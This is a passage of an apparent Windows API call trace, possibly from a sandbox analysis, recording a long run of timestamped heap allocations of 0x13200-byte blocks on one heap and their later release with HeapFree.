Size=0x13200) returned 0x2c43600 [0167.599] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c56810 [0167.599] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c69a20 [0167.599] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c7cc30 [0167.600] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c8fe40 [0167.600] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ca3050 [0167.601] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2cb6260 [0167.601] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2cc9470 [0167.602] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2cdc680 [0167.603] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2cef890 [0167.603] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d02aa0 [0167.604] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d15cb0 [0167.604] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d28ec0 [0167.605] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d3c0d0 [0167.605] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d4f2e0 [0167.607] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d624f0 [0167.607] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d75700 [0167.608] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d88910 [0167.608] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2db0080 [0167.611] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2dc3290 [0167.611] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2dd64a0 [0167.612] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2de96b0 [0167.612] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2dfc8c0 [0167.613] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e0fad0 [0167.613] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9e0) returned 0x5bc5f0 [0167.613] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8910 | out: hHeap=0x590000) returned 1 [0167.613] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e22ce0 [0167.615] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e35ef0 [0167.615] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e49100 [0167.616] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e5c310 [0167.616] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e6f520 [0167.717] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e82730 [0167.717] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e95940 [0167.718] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ea8b50 [0167.718] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ebbd60 [0167.719] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ecef70 [0167.719] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ee2180 [0167.720] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ef5390 [0167.720] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2f085a0 [0167.721] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2f1b7b0 [0167.721] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2f2e9c0 [0167.837] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bc5f0 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c7480 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5e7280 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fa490 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x60d6a0 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x6208b0 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x633ac0 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x646cd0 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x659ee0 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x66d0f0 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1eb0080 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1ec3290 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1ed64a0 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1ee96b0 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1efc8c0 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f0fad0 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f22ce0 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f35ef0 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f49100 | out: hHeap=0x590000) returned 1 [0173.966] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f5c310 | out: hHeap=0x590000) returned 1 [0173.967] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f6f520 | out: hHeap=0x590000) returned 1 [0173.967] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f82730 | out: hHeap=0x590000) returned 1 [0173.967] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1fb0080 | out: hHeap=0x590000) returned 1 [0173.967] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1fc3290 | out: hHeap=0x590000) returned 1 [0173.967] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1fd64a0 | out: hHeap=0x590000) returned 1 [0173.967] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1fe96b0 | out: hHeap=0x590000) returned 1 [0173.967] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1ffc8c0 | out: hHeap=0x590000) returned 1 [0173.980] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x200fad0 | out: hHeap=0x590000) returned 1 [0173.982] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2022ce0 | out: hHeap=0x590000) returned 1 [0173.982] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2035ef0 | out: hHeap=0x590000) returned 1 [0173.982] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2049100 | out: hHeap=0x590000) returned 1 [0173.982] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x205c310 | out: hHeap=0x590000) returned 1 [0173.982] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x206f520 | out: hHeap=0x590000) returned 1 [0173.982] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2082730 | out: hHeap=0x590000) returned 1 [0173.982] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2095940 | out: hHeap=0x590000) returned 1 [0173.982] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x20a8b50 | out: hHeap=0x590000) returned 1 [0174.075] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x20bbd60 | out: hHeap=0x590000) returned 1 [0174.075] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x20cef70 | out: hHeap=0x590000) returned 1 [0174.075] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x20e2180 | out: hHeap=0x590000) returned 1 [0174.076] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x20f5390 | out: hHeap=0x590000) returned 1 [0174.076] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x21085a0 | out: hHeap=0x590000) returned 1 [0174.076] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x211b7b0 | out: hHeap=0x590000) returned 1 [0174.076] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x212e9c0 | out: hHeap=0x590000) returned 1 [0174.076] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2141bd0 | out: hHeap=0x590000) returned 1 [0174.076] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2154de0 | out: hHeap=0x590000) returned 1 [0174.076] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2167ff0 | out: hHeap=0x590000) returned 1 [0174.076] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x217b200 | out: hHeap=0x590000) returned 1 [0174.076] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x218e410 | out: hHeap=0x590000) returned 1 [0174.076] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x21b0080 | out: hHeap=0x590000) returned 1 [0174.076] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x21c3290 | out: hHeap=0x590000) returned 1 [0174.096] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x21d64a0 | out: hHeap=0x590000) returned 1 [0174.097] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x21e96b0 | out: hHeap=0x590000) returned 1 [0174.097] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x21fc8c0 | out: hHeap=0x590000) returned 1 [0174.097] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x220fad0 | out: hHeap=0x590000) returned 1 [0174.097] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2222ce0 | out: hHeap=0x590000) returned 1 [0174.097] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2235ef0 | out: hHeap=0x590000) returned 1 [0174.097] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2249100 | out: hHeap=0x590000) returned 1 [0174.097] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x225c310 | out: hHeap=0x590000) returned 1 [0174.097] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x226f520 | out: hHeap=0x590000) returned 1 [0174.097] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2282730 | out: hHeap=0x590000) returned 1 [0174.097] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2295940 | out: hHeap=0x590000) returned 1 [0174.097] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x22a8b50 | out: hHeap=0x590000) returned 1 [0174.102] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x22bbd60 | out: hHeap=0x590000) returned 1 [0174.102] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x22cef70 | out: hHeap=0x590000) returned 1 [0174.102] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x22e2180 | out: hHeap=0x590000) returned 1 [0174.102] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x22f5390 | out: hHeap=0x590000) returned 1 [0174.102] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x23085a0 | out: hHeap=0x590000) returned 1 [0174.102] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x231b7b0 | out: hHeap=0x590000) returned 1 [0174.102] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x232e9c0 | out: hHeap=0x590000) returned 1 [0174.102] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2341bd0 | out: hHeap=0x590000) returned 1 [0174.103] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2354de0 | out: hHeap=0x590000) returned 1 [0174.103] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2367ff0 | out: hHeap=0x590000) returned 1 [0174.106] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x237b200 | out: hHeap=0x590000) returned 1 [0174.108] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x238e410 | out: hHeap=0x590000) returned 1 [0174.108] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x23a1620 | out: hHeap=0x590000) returned 1 [0174.109] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x23b4830 | out: hHeap=0x590000) returned 1 [0174.112] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x23c7a40 | out: hHeap=0x590000) returned 1 [0174.112] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x23dac50 | out: hHeap=0x590000) returned 1 [0174.112] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x23ede60 | out: hHeap=0x590000) returned 1 [0174.112] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2401070 | out: hHeap=0x590000) returned 1 [0174.112] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2414280 | out: hHeap=0x590000) returned 1 [0174.112] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2427490 | out: hHeap=0x590000) returned 1 [0174.113] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x243a6a0 | out: hHeap=0x590000) returned 1 [0174.113] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x244d8b0 | out: hHeap=0x590000) returned 1 [0174.113] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2460ac0 | out: hHeap=0x590000) returned 1 [0174.113] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2473cd0 | out: hHeap=0x590000) returned 1 [0174.113] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2486ee0 | out: hHeap=0x590000) returned 1 [0174.113] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x249a0f0 | out: hHeap=0x590000) returned 1 [0174.113] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x24ad300 | out: hHeap=0x590000) returned 1 [0174.113] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x24c0510 | out: hHeap=0x590000) returned 1 [0174.118] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x24d3720 | out: hHeap=0x590000) returned 1 [0174.118] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x24e6930 | out: hHeap=0x590000) returned 1 [0174.119] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x24f9b40 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x250cd50 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x251ff60 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2533170 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2546380 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2559590 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x256c7a0 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x257f9b0 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2592bc0 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x25b0080 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x25c3290 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x25d64a0 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x25e96b0 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x25fc8c0 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x260fad0 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2622ce0 | out: hHeap=0x590000) returned 1 [0174.120] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2635ef0 | out: hHeap=0x590000) returned 1 [0174.121] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2649100 | out: hHeap=0x590000) returned 1 [0174.121] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x265c310 | out: hHeap=0x590000) returned 1 [0174.223] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x266f520 | out: hHeap=0x590000) returned 1 [0174.225] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2682730 | out: hHeap=0x590000) returned 1 [0174.225] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2695940 | out: hHeap=0x590000) returned 1 [0174.225] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x26a8b50 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x26bbd60 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x26cef70 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x26e2180 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x26f5390 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x27085a0 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x271b7b0 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x272e9c0 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2741bd0 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2754de0 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2767ff0 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x277b200 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x278e410 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x27a1620 | out: hHeap=0x590000) returned 1 [0174.229] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x27b4830 | out: hHeap=0x590000) returned 1 [0174.234] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x27c7a40 | out: hHeap=0x590000) returned 1 [0174.235] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x27dac50 | out: hHeap=0x590000) returned 1 [0174.235] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x27ede60 | out: hHeap=0x590000) returned 1 [0174.235] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2801070 | out: hHeap=0x590000) returned 1 [0174.235] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2814280 | out: hHeap=0x590000) returned 1 [0174.235] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2827490 | out: hHeap=0x590000) returned 1 [0174.235] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x283a6a0 | out: hHeap=0x590000) returned 1 [0174.235] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x284d8b0 | out: hHeap=0x590000) returned 1 [0174.235] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2860ac0 | out: hHeap=0x590000) returned 1 [0174.236] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2873cd0 | out: hHeap=0x590000) returned 1 [0174.236] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2886ee0 | out: hHeap=0x590000) returned 1 [0174.236] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x289a0f0 | out: hHeap=0x590000) returned 1 [0174.236] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x28ad300 | out: hHeap=0x590000) returned 1 [0174.236] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x28c0510 | out: hHeap=0x590000) returned 1 [0174.241] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x28d3720 | out: hHeap=0x590000) returned 1 [0174.241] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x28e6930 | out: hHeap=0x590000) returned 1 [0174.241] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x28f9b40 | out: hHeap=0x590000) returned 1 [0174.241] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x290cd50 | out: hHeap=0x590000) returned 1 [0174.243] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x291ff60 | out: hHeap=0x590000) returned 1 [0174.244] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2933170 | out: hHeap=0x590000) returned 1 [0174.244] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2946380 | out: hHeap=0x590000) returned 1 [0174.244] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2959590 | out: hHeap=0x590000) returned 1 [0174.244] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x296c7a0 | out: hHeap=0x590000) returned 1 [0174.244] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x297f9b0 | out: hHeap=0x590000) returned 1 [0174.244] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2992bc0 | out: hHeap=0x590000) returned 1 [0174.244] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x29a5dd0 | out: hHeap=0x590000) returned 1 [0174.244] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x29b8fe0 | out: hHeap=0x590000) returned 1 [0174.244] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x29cc1f0 | out: hHeap=0x590000) returned 1 [0174.249] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x29df400 | out: hHeap=0x590000) returned 1 [0174.249] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x29f2610 | out: hHeap=0x590000) returned 1 [0174.249] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a05820 | out: hHeap=0x590000) returned 1 [0174.249] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a18a30 | out: hHeap=0x590000) returned 1 [0174.249] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a2bc40 | out: hHeap=0x590000) returned 1 [0174.417] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a3ee50 | out: hHeap=0x590000) returned 1 [0174.417] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a52060 | out: hHeap=0x590000) returned 1 [0174.417] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a65270 | out: hHeap=0x590000) returned 1 [0174.417] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a78480 | out: hHeap=0x590000) returned 1 [0174.418] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a8b690 | out: hHeap=0x590000) returned 1 [0174.418] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a9e8a0 | out: hHeap=0x590000) returned 1 [0174.418] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ab1ab0 | out: hHeap=0x590000) returned 1 [0174.418] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ac4cc0 | out: hHeap=0x590000) returned 1 [0174.418] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ad7ed0 | out: hHeap=0x590000) returned 1 [0174.421] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2aeb0e0 | out: hHeap=0x590000) returned 1 [0174.421] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2afe2f0 | out: hHeap=0x590000) returned 1 [0174.421] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b11500 | out: hHeap=0x590000) returned 1 [0174.421] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b24710 | out: hHeap=0x590000) returned 1 [0174.421] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b37920 | out: hHeap=0x590000) returned 1 [0174.421] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b4ab30 | out: hHeap=0x590000) returned 1 [0174.423] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b5dd40 | out: hHeap=0x590000) returned 1 [0174.424] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b70f50 | out: hHeap=0x590000) returned 1 [0174.424] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b84160 | out: hHeap=0x590000) returned 1 [0174.424] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b97370 | out: hHeap=0x590000) returned 1 [0174.424] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2baa580 | out: hHeap=0x590000) returned 1 [0174.424] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2bbd790 | out: hHeap=0x590000) returned 1 [0174.424] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2bd09a0 | out: hHeap=0x590000) returned 1 [0174.424] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2be3bb0 | out: hHeap=0x590000) returned 1 [0174.427] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2bf6dc0 | out: hHeap=0x590000) returned 1 [0174.427] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c09fd0 | out: hHeap=0x590000) returned 1 [0174.427] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c1d1e0 | out: hHeap=0x590000) returned 1 [0174.427] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c303f0 | out: hHeap=0x590000) returned 1 [0174.427] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c43600 | out: hHeap=0x590000) returned 1 [0174.427] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c56810 | out: hHeap=0x590000) returned 1 [0174.429] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c69a20 | out: hHeap=0x590000) returned 1 [0174.430] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c7cc30 | out: hHeap=0x590000) returned 1 [0174.430] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c8fe40 | out: hHeap=0x590000) returned 1 [0174.430] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ca3050 | out: hHeap=0x590000) returned 1 [0174.430] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2cb6260 | out: hHeap=0x590000) returned 1 [0174.430] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2cc9470 | out: hHeap=0x590000) returned 1 